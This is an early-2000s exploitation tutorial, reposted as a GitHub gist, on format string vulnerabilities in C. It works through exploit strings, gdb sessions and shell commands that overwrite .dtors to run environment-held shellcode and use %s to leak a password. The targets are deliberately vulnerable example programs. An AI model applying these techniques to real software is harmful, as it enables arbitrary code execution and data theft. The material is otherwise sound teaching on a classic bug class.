Created
August 22, 2017 23:23
-
-
Save cyberheartmi9/2d71a66292ce2a136a78dfb223130908 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.oO NOP Ninjas Oo. | |
presents: [Format String Technique] | |
www.nopninjas.com | |
Author: [email protected] | |
Date: 12-09-01 | |
Version: v1.1 Revised 12/11/01 | |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- | |
-=[Table Of Contents]=- | |
1.0 Prerequisites | |
2.0 Preface | |
3.0 Formats | |
3.1 More formatting | |
3.2 Stack Offsets | |
3.3 %n madness | |
4.0 Exploiting basic format strings | |
4.1 Finding the input arguments / Generating the debugging string | |
4.2 Placing the shellcode / What to overwrite? | |
4.3 Creating/Debugging the writing format string | |
4.4 Finding the shellcode | |
4.5 Creating the final string / Calculations | |
4.6 Executing the string | |
5.0 Shortening the format string | |
6.0 Format strings on the heap | |
6.1 Placing the addresses on the stack | |
6.2 Finding hard to reach data | |
6.3 Aligning the data | |
6.4 Finishing touches | |
7.0 Misc | |
7.1 About blind and remote (non-stock binary) attacks | |
7.2 Types of real world format strings | |
7.3 How to abuse %s | |
8.0 Information | |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- | |
1.0 Prerequisites | |
Required: | |
Knowledge of gdb, Linux memory allocation, and ELF executable format. | |
C string formatting | |
Little endian byte ordering | |
Helpful but Optional | |
Easyflow http://www.nopninjas.com/easy.tgz | |
http://lamagra.sekure.de/ | |
Scut from TESO: paper on format strings | |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- | |
2.0 Preface | |
This document is not a definitive guide to exploiting format strings. | |
Other useful information will come from experimenting. I hope this | |
paper will explain how things are done in a somewhat easy to understand | |
manner. I have tried to demonstrate as much as possible through examples | |
(wherever possible). | |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- | |
3.0 Formats | |
First format strings in c should be examined. There are only a few format | |
characters from the entire that are relevant to this discussion. Any search | |
engine should yield a more thorough list of websites with further information. | |
%x - Print the hex value of the argument. | |
%s - The char string at the address passed to it. | |
%d - For our purposes this will just print strings of data for | |
incrementing bytes. Should not be used, can create unwanted | |
output. | |
%u - For our purposes this will just print strings of data for | |
incrementing bytes. This is unsigned as compared to %d | |
which is signed. This will drop any negative values that | |
could possibly add a - into the output. | |
%n - Write the number of bytes previously written to the address | |
given. | |
Functions that use formatting are vulnerable when the programmer does | |
not properly format the data before passing it. | |
incorrect: printf(string); | |
correct: printf("%s", string); | |
This simple mistake could lead to a big security risk. All of the printf | |
family of functions have this type of problem: (printf, fprintf, sprintf, | |
snprintf, vsprintf, vsnprintf, etc). There are also other functions which may | |
use formats (like syslog). | |
3.1 More formatting | |
Since there are not any arguments given by the programmer, it | |
will take the first argument off the stack. With the "$" format modifier | |
any of the passed arguments can be referenced. For example: | |
printf("%2$x %1$x\n", 0x1, 0x2); | |
would output: | |
"2 1" | |
3.2 Stack offsets | |
It is assumed that the reader has some knowledge of how the stack works but | |
it is not required. The most important thing that must be learned is the | |
layout of where input data lies in relation to the current stack position. The | |
crude diagram shows the layout as so: | |
Bottom Top | |
[ user stack ][ command line args ][ environment ] | |
As noted, this is a crude diagram to illustrate the general layout. The | |
current position will be somewhere in the user stack. It is possible to pop | |
arguments off the stack to be displayed in hex with %x. With multiple %x | |
formats it is possible to reach the top of the stack. | |
Using the "$" modifier any argument can be directly accessed by its stack | |
offset. Instead of a long strings of %x's there could be one "%95$x". Being | |
able to access user input via stack offsets it crucial to the exploitation | |
of format strings. | |
3.3 %n madness | |
The %n format is used to write the amount of bytes already written into the | |
specified (int) argument. When there is no argument given, it writes to the | |
next argument on the stack. %n can be formatted with the "$" modifier to | |
select any argument offset. %hn does the same thing but with the type (short). | |
Here is an example of how it can be used: | |
int main(int argc, char *argv[]) { | |
int num; | |
printf("%s%n\n", argv[1], &num); | |
printf("Bytes written: %p\n", num); | |
} | |
sloth@sin:~/source/nopninjas$ ./test 1234567890 | |
1234567890 | |
Bytes written: | |
Notice that 0xa = 10. To write 0xbfff, write 49151 characters into argv[1]. | |
To test this out: | |
sloth@sin$ ./test `perl -e 'print "A"x49151'` | |
... lots of A's ... | |
Bytes written: 0xbfff | |
This method can be abused and given an arbitrary address. This is what makes | |
format strings lethal. | |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- | |
4.0 Exploiting basic format strings | |
It is not always simple to place the input data somewhere on the stack | |
where it is easily reached. The following is a very simple demonstration: | |
fmt1.c ---------------------------------------------------- | |
int main(int argc, char *argv[]) { | |
char buf[1024]; | |
strncpy(buf, argv[1], sizeof(buf)); | |
printf(argv[1]); | |
printf("\n"); | |
} | |
------------------------------------------------------------ | |
sloth@sin$ ./fmt 'AAAA %x' | |
AAAA 41414141 | |
4.1 Finding the input arguments / Generating the debugging string | |
The input is the next argument on the stack. Next expand the string into a | |
more realistic form so that that the offsets on the stack will match up after | |
changing the command line arguments. Use easyflow during the testing phase | |
of writing format string exploits. Either the UNIX printf command in the shell | |
or Perl will suffice. Keep in mind the little endian byte ordering of the | |
addresses. easyfl: \l01020304 is the same as printf/perl: \x04\x03\x02\x01. | |
sloth@sin$ ./fmt `easyfl '\l41414141\l42424242 \ | |
\l43434343\l44444444%.010u%1$x%.010u%2$x%.010u%3$x%.010u%4$x'` | |
AAAABBBBCCCCDDDD109479558541414141111163859442424242 \ | |
11284816034343434314532461244444444 | |
sloth@sin$ | |
Here is the output with the values bracketed: | |
AAAABBBBCCCCDDDD1094795585(41414141)1111638594(42424242) \ | |
1128481603(43434343)145324612(44444444) | |
Each of the 4 byte address strings will eventually point to locations in | |
memory where writing is needed. Any 4 byte strings that are easily | |
recognizable in a mess of data will do. If the %x offsets are correct, | |
each of the address strings should be printed as hex in the order given. | |
It is possible to put the brackets around the %x to make the output easier | |
to read. In more complicated examples it may lead to changing the stack, | |
throwing off the stack argument offset values. | |
The %.010u will print out 10 bytes of data. Later these will be modified | |
to change the values that %n will write. Those 10 bytes will be written as | |
0x0a into memory given that these are the first bytes written. Each following | |
write will be an accumulation of bytes already written. For now, They are | |
there to keep the string as static in length as possible during testing to | |
reduce the chances of the offsets shifting. | |
Since the first address is at the first argument offset on the stack we | |
could just use %x. To conform with the rest of the string we can convert | |
it to: %1$x. Each following address is selected by increasing the offset: | |
%1$x %2$x %3$x %4$x. | |
4.2 Placing the shellcode / What to overwrite? | |
For simplicity put the executable code into our environment: | |
sloth@sin$ EXECSHELL=`easyfl '[200,\x90] \ | |
<linux.hello>'` | |
sloth@sin$ export EXECSHELL | |
Also for simplicity, overwrite .dtors. Further information on overwriting | |
.dtors can be found at: | |
http://community.core-sdi.com/~juliano/dtors.txt | |
To find the beginning of the .dtors section use "nm <execname>" or some other | |
similar utility to view the symbols table. In gdb the .dtors address can be | |
obtained with "maintenance info sections". | |
sloth@sin$ nm fmt | |
... skipping ... | |
080494a8 ? __DTOR_END__ | |
080494a4 ? __DTOR_LIST__ | |
... skipping | |
Here is the stripped output from nm. The address that needs to be written is | |
4 bytes past the start of the .dtors section: 0x080494a4 + 4 = 0x080494a8. | |
4.3 Creating/Debugging the writing format string | |
Now that there is an address to write to, it will need to be put into the | |
format string. Each of following addresses will need to be incremented by 1 to | |
point to the next location in memory to write to. 0x080494a8 0x080494a9 | |
0x080494aa 0x080494ab | |
sloth@sin$ ./fmt `easyfl '\l080494a8 \ | |
\l080494a9\l080494aa\l080494ab%.010u%1$n%.010u%2$n%.010u%3$n \ | |
%.010u%4$n'` | |
... output not useful ... | |
Segmentation fault (core dumped) | |
sloth@sin$ | |
sloth@sin$ gdb fmt core | |
GNU gdb 5.0 | |
Copyright 2000 Free Software Foundation, Inc. | |
... skipping ... | |
(gdb) bt | |
#0 0x382e241a in ?? () | |
#1 0x8048479 in _fini () | |
#2 0x4003d80d in exit () from /lib/libc.so.6 | |
#3 0x4003557d in __libc_start_main () from /lib/libc.so.6 | |
(gdb) | |
This shows that it crashed during the destructor phase (_fini). | |
The current EIP seems quite random at the moment because each | |
byte has not been adjusted yet. | |
4.4 Finding the shellcode | |
The address to the executable code in this environment will need to be | |
found. gdb is the way to go. This topic is covered in the suggested reading | |
material. | |
sloth@sin$ gdb fmt core | |
GNU gdb 5.0 | |
Copyright 2000 Free Software Foundation, Inc. | |
... blah blah ... | |
#0 0x382e241a in ?? () | |
(gdb) x/2000x $ebp | |
0xbffff854: 0xbffff860 0x08048479 0x401019b4 0xbffff874 | |
0xbffff864: 0x4003d80d 0x401019b4 0x4000aa70 0xbffff8c4 | |
0xbffff874: 0xbffff898 0x4003557d 0x00000001 0x00000002 | |
... pages of data in hex ... | |
0xbffffec4: 0x2f65646b 0x3a6e6962 0x7273752f 0x6168732f | |
0xbffffed4: 0x742f6572 0x666d7865 0x6e69622f 0x45584500 | |
0xbffffee4: 0x45485343 0x903d4c4c 0x90909090 0x90909090 | |
0xbffffef4: 0x90909090 0x90909090 0x90909090 0x90909090 | |
0xbfffff04: 0x90909090 0x90909090 0x90909090 0x90909090 | |
... BINGO! ... | |
Starting from the EBP ($ebp in gdb) search for the hex representation of | |
the NOP's in the shellcode with "x/x". Above, 0x90909090 is at 0xbfffff04. | |
4.5 Creating the final string / Calculation | |
Always remember to write in order of least significant bit to most | |
significant. In this case the %u before the first %n will be the one to | |
increment. There are 2 ways to do this -- calculate how many more bytes are | |
needed or guess and adjust as needed. In small examples like this one, the | |
guess and check method will work; however, sometimes due to the lack of | |
output it may be necessary to calculate it exactly. | |
0x382e241a can be broken down into each byte as it would be written. | |
First, 0x1a (26 in decimal) shows that 26 bytes have been written before | |
the %n. 16 bytes are the addresses 0x080494a8 0x080494a9 0x080494aa | |
0x080494ab plus 10 more from "%.010u". The next byte 0x24 (36 in decimal) | |
is a combination of the 26 previous bytes already written and another 10 | |
from the second "%.010u". 0x2e (46 in decimal) is another 10 bytes more | |
than the last. The same is with 0x38. | |
It probably is not necessary to have to modify the least significant bit | |
if the shellcode is longer than 256 bytes. Our new goal address to write | |
is 0xbfffff1a. | |
0xbfffff1a = [191][255][255][ 26] | |
255 - 26(4*4+10 bytes for argument addresses + %.010u) = 229 | |
255 - 255 = 0 <-- This means nothing has to be written for the 3rd | |
(amount needed) - (already written) = (amount left to write) | |
Subtract the amount of bytes already written from the amount of bytes | |
needed. This will be the amount to put into the value for %u. Also, to | |
jump ahead slightly, the next number is 255. This means that the same | |
value can be reused in more accurate terms. Since it will have already | |
written 255 bytes, the third %u can be removed. Here is the current string | |
so far: | |
sloth@sin$ ./fmt `easyfl'\l080494a8\l080494a\l080494aa \ | |
\l080494ab%.010u%1$n%.229u%2$n%3$n%.010u%4$n'` | |
Coming Soon. | |
Summary: [%.010u %1$n %.229u %2$n %3$n][%.010u %4$n] | |
If it is not possible to subtract bytes written without a negative answer, | |
the last write will have to roll over into the next significant byte. | |
255 = 0xff | |
255 + 256 = 0x1ff <-- roll over | |
191 = 0xbf | |
191 + 256 = 0x1bf(447) | |
447 - 255 = 192 | |
192 bytes will have to be written with %u to get the last value in | |
place. The final string should look like: | |
sloth@sin$ ./fmt `easyfl '\l080494a8\l080494a9\l080494aa \ | |
\l080494ab%.010u%1$n%.229u%2$n%3$n%.192u%4$n'` | |
Summary: [%.010u %1$n %.229u %2$n %3$n %.192u %4$n] | |
4.6 Executing the string | |
It's time to execute it and check the results. In the example the "hello | |
world" shellcode was used. It will just print the string and exit. An | |
extra "; echo" at the end will add a new line after the "hello world" | |
because the default shellcode in easyfl does not contain a "\n". | |
sloth@sin$ ./fmt `easyfl '\l080494a8\l080494a9\l080494aa \ | |
\l080494ab%.010u%1$n%.229u%2$n%3$n%.192u%4$n'`; echo | |
013451792800000000000000000000000000000000000000000000000000000000 \ | |
000000000000000000000000000000000000000000000000000000000000000000 \ | |
000000000000000000000000000000000000000000000000000000000000000000 \ | |
000000000000000000000000000000001345179290000000000000000000000000 \ | |
000000000000000000000000000000000000000000000000000000000000000000 \ | |
000000000000000000000000000000000000000000000000000000000000000000 \ | |
00000000000000000000000000134517930 | |
hello world | |
sloth@sin$ | |
The odd numbers inside the string of 0's are the arguments popped from the | |
stack by %u. If the "$" modifier is not used with %x or %n it would require | |
having buffer arguments to pass to %u. | |
[%u arg][%n arg][%u arg][%n arg][%u arg][%n arg][%u arg][%n arg] | |
real: [AAAA][\l080494a8][AAAA][\l080494a9] etc... | |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- | |
5.0 Shortening the format string | |
It is not necessary to use 4 write statements. It is possible to only | |
use 2 writes, each of 2 bytes to write the data. This way other data is not | |
accidently overwritten if it is necessary to roll a value into the next | |
significant byte. It is also used to make the string even smaller. For safety | |
%hn is employed here even though just %n could be used. Using the last example | |
we can build our sample string. | |
The 2 locations that need to be written to (.dtors) | |
0x080494a8 0x080494a8+2 <-- The second argument address is | |
incremented by 2. | |
0xbfffff1a is still our shellcode address. We can break this up: | |
0xbfff = 49151 | |
0xff1a = 65306 | |
65306 - 8(bytes for addresses) = 65298(bytes left for %u to write) | |
49151 + 65536 = 0x1bfff | |
0x1bfff(total) - 0xff1a(already written) = 49381(needed) | |
No more goofing around. Lets test it out: | |
sloth@sin$ ./fmt `easyfl '\l080494a8\l080494aa%.65298u%1$hn \ | |
%.49381u%2$hn'`; echo | |
... LOTS AND LOTS OF STUFF ... | |
hello world | |
sloth@sin$ | |
Yet another format string is broken. | |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- | |
6.0 Format strings on the heap | |
For the next example the format string will be placed on the heap. | |
Because this is a local hole, exploiting it should be fairly trivial. | |
fmt2.c ---------------------------------------------------------- | |
#include <stdio.h> | |
#include <stdlib.h> | |
int main(int argc, char *argv[]) { | |
char *blah=malloc(1024); | |
fgets(blah, 1023, stdin); | |
printf(blah); | |
} | |
------------------------------------------------------------------ | |
6.1 Placing the addresses on the stack | |
Sometimes the input buffer to the format string is not on the stack. On | |
a local system this is a simple task. The addresses can be placed as an | |
argument string to the program or can be placed in the environment. Be careful | |
for special characters that may not be passed such as \x00 on the command line. | |
sloth@sin$ export ADDYS="AAAAAAAA" | |
or | |
sloth@sin$ ./fmt2 'AAAAAAAA' (must be done with each execution) | |
6.2 Finding hard to reach data | |
To find the general offset a simple bash loop can be used: | |
sloth@sin$ for (( I=1; I<500; I=`expr $I + 1` )); do \ | |
( echo "$I %$I\$x" ) | ./fmt2 |grep 4141; done | |
364 4141413d | |
365 41414141 | |
6.3 Aligning the data | |
As you can see, the alignment is off because of the the rest of the data | |
in the environment. | |
sloth@sin$ export ADDYS="AAAABBBB" | |
sloth@sin$ (echo '%.00010u%364$x%.00010u%365$x') | ./fmt2 | |
Bracketed: 0134518248(4141413d)1073743880(42424241) | |
Adding an alignment character to the string will fix the leaking characters. | |
sloth@sin$ export ADDYS="AAAABBBBX" | |
sloth@sin$ (echo '%.00010u%364$x%.00010u%365$x') | ./fmt2 | |
Bracketed: 0134518248(41414141)1073743880(42424242) | |
Everything is aligned now. It is time to put the addresses for .dtors into | |
the environment. | |
6.4 Finishing touches | |
sloth@sin$ export ADDYS=`easyfl '\l080494f4\l080494f6X'` | |
This format string does not have any addresses or data printed before it. | |
%u will have to write the exact amount for the first write. | |
0xff1a = 65306 | |
0x1bfff - 0xff1a = 49381 | |
sloth@sin$ (echo '%.65306u%364$hn%.49381u%365$hn') | ./fmt2; echo | |
... LOTS OF GARBAGE ... | |
hello world | |
sloth@sin$ | |
Again the hello world shellcode is executed. | |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- | |
7.0 Misc Stuff | |
7.1 About blind and remote(non-stock binary) attacks | |
When it comes down to blind or remote format strings it is necessary to | |
be very precise. Exact calculations as well as stack dumps with %x can be very helpful. .dtors is really only useful when there is access to the binary. This | |
is all stuff that should be learned through experimentation. | |
7.2 Types of real world format strings | |
fprintf, printf, sprintf, snprintf, vfprintf, vprintf, vsprintf, | |
vsnprintf, setproctitle, syslog, and more. These are all commonly missused | |
in the real world. Here is an example of a misused vsnprintf (a personal | |
favorite). | |
fmt4.c ------------------------------------------------ | |
#include <stdio.h> | |
#include <stdarg.h> | |
void printing(char *fmt, ...) { | |
va_list ap; | |
char output[1024]; | |
va_start(ap, fmt); | |
vsnprintf(output, sizeof(output), fmt, ap); | |
printf("ARG: %s\n", output); | |
va_end(ap); | |
} | |
int main(int argc, char *argv[]) { | |
if(argc>1) printing(argv[1]); <-- printing() must be formatted | |
/* correct usage */ | |
/* if(argc>1) printing("%s", argv[1]); */ | |
} | |
---------------------------------------------------------- | |
7.3 How to abuse %s | |
With %s, any string in valid memory can be output. It could be a password, | |
user data, environment variables, or anything else that could be useful. Here | |
is a sample of how to abuse %s: | |
password.c ----------------------------------------------- | |
static char password[] = "hax0r"; | |
int main(int argc, char *argv[]) { | |
char buf[256]; | |
strncpy(buf, argv[1], sizeof(buf)); | |
printf(buf); | |
} | |
---------------------------------------------------------- | |
With the output of nm the address of password can be found. | |
sloth@sin$ nm test | |
... skipping ... | |
08049484 d password | |
... skipping ... | |
0x08049484 is the address of password. | |
sloth@sin$ ./test `easyfl '\l08049484%s'`; echo | |
hax0r | |
sloth@sin$ | |
This is just a very basic example. Using %x to dump data off the heap, it could | |
be possible to use that data with %s to find out more information about what | |
exactly is happening. | |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- | |
8.0 Information | |
www.nopninjas.com - My stupid site. Links to resources, news, | |
and wargames. | |
www.pulltheplug.com - Wargames collection (irc.pulltheplug.com | |
vuln dev). Thanks to dies and all the | |
maintainers of the various servers. Also all | |
those who help others. | |
http://bassd.labs.pulltheplug.com | |
http://mainsource.labs.pulltheplug.com | |
hack.datafort.net - More wargames | |
community.core-sdi.com - good stuff | |
www.rootsecurity.net - Cool people [RsN] | |
Also runs bassd.labs.pulltheplug.com. | |
12/09/01 - www.nopninjas.com - [email protected] | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment